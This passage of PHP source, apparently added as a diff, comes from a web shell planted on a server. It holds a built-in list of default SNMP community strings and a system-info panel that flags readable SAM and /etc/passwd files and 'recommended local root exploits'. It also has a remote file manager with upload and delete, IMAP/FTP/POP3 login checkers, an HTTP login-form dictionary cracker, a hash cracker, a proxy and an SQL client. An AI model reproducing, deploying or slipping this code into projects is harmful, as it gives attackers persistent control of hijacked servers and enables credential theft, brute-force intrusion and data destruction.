bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et"; +} +} +function sysinfO(){ +global $windows,$disablefunctions,$cwd,$safemode; +$t8="<td width='25%' bgcolor='#808080'>"; +$t6="<td width='25%' bgcolor='#666666'>"; +$mil="<a target='_blank' href='http://www.milw0rm.org/related.php?program="; +$basedir=(ini_get('open_basedir') || strtoupper(ini_get('open_basedir'))=='ON')?'ON':'OFF'; +if(!empty($_SERVER['PROCESSOR_IDENTIFIER']))$CPU=$_SERVER['PROCESSOR_IDENTIFIER']; +$osver=$tsize=$fsize=''; +$ds=implode(' ',$disablefunctions); +if($windows){ +$osver=' ('.shelL('ver').')'; +$sysroot=shelL("echo %systemroot%"); +if(empty($sysroot))$sysroot=$_SERVER['SystemRoot']; +if(empty($sysroot))$sysroot = getenv('windir'); +if(empty($sysroot))$sysroot = 'Not Found'; +if(empty($CPU))$CPU=shelL('echo %PROCESSOR_IDENTIFIER%'); +for($i=66;$i<=90;$i++){ +$drive=chr($i).':\\'; +if(is_dir($drive)){ +$fsize+=disk_free_space($drive); +$tsize+=disk_total_space($drive); +} +} +}else{ +$ap=shelL('whereis apache'); +if(!$ap)$ap='Unknow'; +$fsize=disk_free_space('/'); +$tsize=disk_total_space('/'); +} +$xpl=rootxpL();if(!$xpl)$xpl='Not found.'; +$disksize='Used spase: '.showsizE($tsize-$fsize).' Free space: '.showsizE($fsize).' Total space: '.showsizE($tsize); +if(empty($CPU))$CPU='Unknow'; +$os=php_uname(); +$osn=php_uname('s'); +if(!$windows){ +$ker=php_uname('r'); +$o=($osn=='Linux')?'Linux+Kernel':$osn; +$os=str_replace($osn,"${mil}$o'>$osn</a>",$os); +$os=str_replace($ker,"${mil}Linux+Kernel'>$ker</a>",$os); +$inpa=':'; +}else{ +$sam=$sysroot."\\system32\\config\\SAM"; +$inpa=';'; +$os=str_replace($osn,"${mil}MS+Windows'>$osn</a>",$os); +} +$cuser=get_current_user(); +if(!$cuser)$cuser='Unknow'; +$software=str_replace('Apache',"${mil}Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']); +echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>"; +if($windows){ +echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='".hlinK("seC=fm&workingdiR=$sysroot")."'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";if(is_readable(($sam)))echo "<a href='".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."'>Readable</a>"; else echo 'Not readable';echo '</td></tr>'; +} +else +{ +echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>".getmyuid().' - '.getmygid()."</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>"; +if(is_readable('/etc/passwd'))echo "<a href='".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."'>Readable</a>";else echo'Not readable';echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: "; +if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "<a href='".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."'>Readable</a>";else echo 'Not readable';}else echo 'Not found';echo ')</td></tr>'; +} +echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=".php_logo_guid()."' target='_blank'>".PHP_VERSION."</a> (<a href='".hlinK("seC=phpinfo&workingdiR=$cwd")."'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";if (function_exists('zend_version')) echo "<a href='?=".zend_logo_guid()."' target='_blank'>".zend_version().'</a>';else echo 'Not Found';echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";}echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq</td></tr></table>"; +} +function checksuM($file){ +global $et; +echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>".md5_file($file).'</font><br><b>SHA1:</b><font color=#F0F0F0>'.sha1_file($file)."</font>$et"; +} +function listdiR($cwd,$task){ +$c=getcwd(); +$dh=opendir($cwd); +while($cont=readdir($dh)){ +if($cont=='.' || $cont=='..')continue; +$adr=$cwd.DIRECTORY_SEPARATOR.$cont; +switch($task){ +case '0':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break; +case '1':if(is_writeable($adr)){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break; +case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break; +case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break; +case '4':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break; +case '5':if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break; +case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break; +case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break; +case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;} +} +if(is_dir($adr))listdiR($adr,$task); +} +} +if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}} +if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}} +function filemanageR(){ +global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd; +$table="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>"; +$td1n="<td width='22%' bgcolor='#666666'>"; +$td2m="<td width='22%' bgcolor='#808080'>"; +$td1i="<td width='5%' bgcolor='#666666'>"; +$td2i="<td width='5%' bgcolor='#808080'>"; +$tdnr="<td width='22%' bgcolor='#800000'>"; +$tdw="<td width='22%' bgcolor='#006E00'>"; +if(!empty($_REQUEST['task'])){ +if(!empty($_REQUEST['search']))$_REQUEST['task']=7; +if(!empty($_REQUEST['re']))$_REQUEST['task']=6; +echo '<font color=blue><pre>'; +listdiR($cwd,$_REQUEST['task']); +echo '</pre></font>'; +}else{ +if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){ +if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ +$title='Destination'; +$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; +$dis=(!empty($_REQUEST['cP']))?'Copy':'Move'; +}else{ +$ad=$_REQUEST['rN']; +$title='New name'; +$dis='Rename'; +} +if(!!empty($_REQUEST['deS'])){ +echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";if(empty($_REQUEST['rN']))echo $cwd;echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='".htmlspecialchars($ad)."' name=cp><input class=buttons type=submit value=$dis></form>$et</center>"; +}else{ +if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']); +else{ +copy($ad,$_REQUEST['deS']); +if(!empty($_REQUEST['mV']))unlink($ad); +} +} +} +if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);} +if(!empty($_FILES['uploadfile'])){ +move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); +echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; +} +$select="<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='".hlinK("seC=fm&workingdiR=$cwd")."'>--------</option><option value='"; +if(!empty($_REQUEST['newf'])){ +if(!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],'');} +if(!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} +} +if($windows){ +echo "$table<td><b>Drives:</b> "; +for($i=66;$i<=90;$i++){$drive=chr($i).':'; +if(is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title='$vol' href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} +} +echo $et; +} +echo "$table<form method='POST'><tr><td width='20%'><b>[ <a id='lk' style='text-decoration:none' href='#' onClick=\"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et"; +$file=$dir=$link=array(); +if($dirhandle=opendir($cwd)){ +while($cont=readdir($dirhandle)){ +if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont; +elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont; +else $link[]=$cont; +} +closedir($dirhandle); +sort($file);sort($dir);sort($link); +echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>"; +$i=0; +foreach($dir as $dn){ +echo '<tr>'; +$i++; +$own='Unknow'; +$owner=posix_getpwuid(fileowner($dn)); +$mdate=date('Y/m/d H:i:s',filemtime($dn)); +$adate=date('Y/m/d H:i:s',fileatime($dn)); +$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."'>Rename</option><option value='".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."'>Remove</option></select></td>"; +if($owner)$own="<a title=' Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK('seC=fm&workingdiR='.realpath($dn))."'>"; +if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo '</a></td>'; +echo "$cl1------</td>"; +echo $cl2.$diraction; +echo '</tr>'; +} +foreach($file as $fn){ +echo '<tr>'; +$i++; +$own='Unknow'; +$owner=posix_getpwuid(fileowner($fn)); +$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open</option><option value='".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."'>Move</option><option value='".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."'>Remove</option></select></td>"; +$mdate=date('Y/m/d H:i:s',filemtime($fn)); +$adate=date('Y/m/d H:i:s',fileatime($fn)); +if($owner)$own="<a title='Shell:".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +$size=showsizE(filesize($fn)); +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>"; +if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "</a></td>"; +echo "$cl1$size</td>"; +echo $cl2.$fileaction; +echo '</tr>'; +} +foreach($link as $ln){ +$own='Unknow'; +$i++; +$owner=posix_getpwuid(fileowner($ln)); +$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open</option><option value='".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."'>Move</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."'>Rename</option><option value='".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."'>Remove</option></select></td>"; +$mdate=date('Y/m/d H:i:s',filemtime($ln)); +$adate=date('Y/m/d H:i:s',fileatime($ln)); +if($owner)$own="<a title='Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +echo '<tr>'; +$size=showsizE(filesize($ln)); +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."'>"; +if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}";echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "</a></td>"; +echo "$cl1$size</td>"; +echo $cl2.$linkaction; +echo '</tr>'; +} +} +$dc=count($dir)-2; +if($dc==-2)$dc=0; +$fc=count($file); +$lc=count($link); +$total=$dc+$fc+$lc; +$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB'; +echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc$et<table bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";if (is_writeable($cwd)) echo '#006E00';elseif (!is_readable($cwd)) echo '#800000';else '#333333'; echo '>Current directory status: ';if (is_readable($cwd)) echo 'R';if (is_writeable($cwd)) echo 'W' ;echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t}Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et"; +} +} +function imapchecK($host,$username,$password,$timeout){ +$sock=fsockopen($host,143,$n,$s,$timeout); +$b=uniqid('NJ'); +$l=strlen($b); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +fclose($sock); +if($res=="$b OK")return 1;else return 0; +} +function ftpchecK($host,$username,$password,$timeout){ +$ftp=ftp_connect($host,21,$timeout); +if(!$ftp)return -1; +$con=ftp_login($ftp,$username,$password); +if($con)return 1;else return 0; +} +function pop3checK($server,$user,$pass,$timeout){ +$sock=fsockopen($server,110,$en,$es,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function formcrackeR(){ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo '<font color=blue>Cracking started...<br>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if(!$res){echo "<font color=blue>U: $user P: $pass</font><br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;} +} +fclose($dictionary); +echo 'Done!</font><br>'; +} +else echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://".getenv('HTTP_HOST')."/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit name=start value=Start></form>$et</center>"; +} +function hashcrackeR(){ +global $errorbox,$t,$et,$hcwd; +if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if($dictionary){ +$hash=strtoupper($_REQUEST['hash']); +echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>'; +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";if($log)file_add_contentS($file,"$x\r\n");break;} +} +echo 'Done!</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "<center>${t}Hash cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Hash:</td><td bgcolor='#808080'><input type=text name=hash size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Type:</td><td bgcolor='#666666'><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width='20%' bgcolor='#808080'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#808080;' checked>Log</td><td bgcolor='#808080'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>"; +} +function pr0xy(){ +global $errorbox,$et,$footer,$hcwd; +echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";if(!!empty($_REQUEST['urL'])) echo 'http://www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et"; +if(!empty($_REQUEST['urL'])){ +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$dir=dirname($file); +$con=getiT($_REQUEST['urL']); +$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/")); +$con=replace_stR($s,$con); +echo $con; +} +} +function sqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; +$res=querY($type,$server,$user,$pass,$db,$query); +if($res){ +$res=str_replace('|-|-|-|-|-|','</td><td>',$res); +$res=str_replace('|+|+|+|+|+|','</td></tr><tr><td>',$res); +$r=explode('[+][+][+]',$res); +$r[1]=str_replace('[-][-][-]',"</td><td bgcolor='333333'>",$r[1]); +echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>".$r[1].'</tr><tr><td>'.$r[0]."$et<br>"; +} +else{ +echo "$errorbox Failed!$et<br>"; +} +} +if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; +echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MySQL')echo 'selected';echo 